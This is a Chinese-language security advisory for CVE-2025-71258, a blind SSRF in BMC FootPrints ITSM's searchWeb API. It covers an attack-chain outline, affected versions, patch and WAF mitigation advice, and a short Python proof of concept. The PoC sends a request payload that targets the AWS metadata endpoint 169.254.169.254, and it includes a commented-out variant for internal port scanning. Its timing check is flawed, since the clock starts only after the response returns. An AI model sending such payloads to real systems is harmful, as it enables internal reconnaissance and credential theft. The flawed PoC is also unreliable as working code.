CVE-2025-71258: BMC FootPrints ITSM searchWeb API组件Blind SSRF漏洞

漏洞信息

漏洞编号

CVE-2025-71258

漏洞类型

Blind SSRF（服务端请求伪造）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

BMC FootPrints ITSM

漏洞概述

CVE-2025-71258是BMC FootPrints ITSM版本20.20.02至20.24.01.001中的一个中危安全漏洞。该漏洞存在于searchWeb API组件中，是一种Blind Server-Side Request Forgery（盲服务端请求伪造）漏洞。攻击者利用该漏洞可以通过构造恶意URL，诱导服务器向任意目标地址发起请求。由于是盲SSRF，攻击者无法直接获取响应内容，但可以通过时间延迟或外部观察来验证请求是否成功发送。低权限的已认证用户即可利用此漏洞，对内网系统进行端口扫描、服务探测，或与内部服务进行交互，从而造成敏感信息泄露或影响系统可用性。

技术细节

该漏洞源于searchWeb API组件对用户输入的URL缺乏有效的验证和过滤机制。攻击者作为已认证用户，可以向searchWeb端点发送包含恶意构造URL的请求。服务器在处理请求时会执行该URL对应的HTTP/HTTPS请求，从而实现服务端请求伪造。由于是Blind SSRF，服务器不会将目标URL的响应内容返回给攻击者，但攻击者可以通过测量响应时间来判断请求是否成功（如探测内部服务端口开放状态）。攻击者可以利用此漏洞扫描内网段、访问内部管理接口、读取本地文件（通过file://协议），甚至可能利用云元数据服务（如AWS 169.254.169.254）获取敏感凭证。

攻击链分析

STEP 1

步骤1

攻击者获取BMC FootPrints ITSM系统的低权限账户

STEP 2

步骤2

攻击者构造包含恶意URL的searchWeb API请求，URL指向内部服务或元数据端点

STEP 3

步骤3

服务器缺乏URL验证，执行攻击者指定的请求并与目标地址建立连接

STEP 4

步骤4

通过响应时间差异或外部日志服务器确认请求是否成功发送（Blind SSRF特征）

STEP 5

步骤5

利用获取的信息进行进一步攻击，如内网渗透、数据窃取或服务中断

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import time

target = "https://vulnerable-server/ searchWeb endpoint"

# Blind SSRF PoC - check internal metadata service
# This PoC demonstrates how an attacker can cause the server to make arbitrary requests

def exploit_ssrf(target_url, attacker_callback):
    """
    PoC for CVE-2025-71258 - BMC FootPrints ITSM Blind SSRF
    
    This demonstrates sending a crafted request to the searchWeb API
    that causes the server to initiate an outbound request to an arbitrary URL.
    
    Note: In a real attack, the attacker would use time-based detection
    or an external server to log the requests.
    """
    
    # Malicious payload targeting internal metadata service
    payload = {
        "searchQuery": "test",
        "url": "http://169.254.169.254/latest/meta-data/"  # AWS metadata endpoint
    }
    
    # Alternative: Internal port scanning
    # payload = {
    #     "searchQuery": "test", 
    #     "url": "http://internal-server:port/path"
    # }
    
    try:
        response = requests.post(target_url, json=payload, timeout=10)
        
        # Time-based detection for blind SSRF
        start_time = time.time()
        
        # If the request takes longer, the port might be open
        # (connect timeout vs read timeout behavior)
        
        return {
            "status": response.status_code,
            "response_time": time.time() - start_time
        }
    except requests.exceptions.Timeout:
        # Timeout may indicate the request was made but no response
        return {"status": "timeout", "note": "Potential SSRF detected"}
    except Exception as e:
        return {"error": str(e)}

影响范围

BMC FootPrints ITSM 20.20.02

BMC FootPrints ITSM 20.20.03

BMC FootPrints ITSM 20.21.01

BMC FootPrints ITSM 20.21.02

BMC FootPrints ITSM 20.22.01

BMC FootPrints ITSM 20.23.01

BMC FootPrints ITSM 20.24.01

BMC FootPrints ITSM 20.20.02 through 20.24.01.001

防御指南

临时缓解措施

立即应用BMC官方发布的热修复补丁（20.20.02、20.20.03.002、20.21.01.001、20.21.02.002、20.22.01.001、20.23.01.002或20.24.01）。如无法立即更新，可通过WAF规则限制对searchWeb端点的访问，并对URL参数实施严格验证，阻止对内网IP段（10.0.0.0/8、172.16.0.0/12、192.168.0.0/16）和云元数据端点的请求。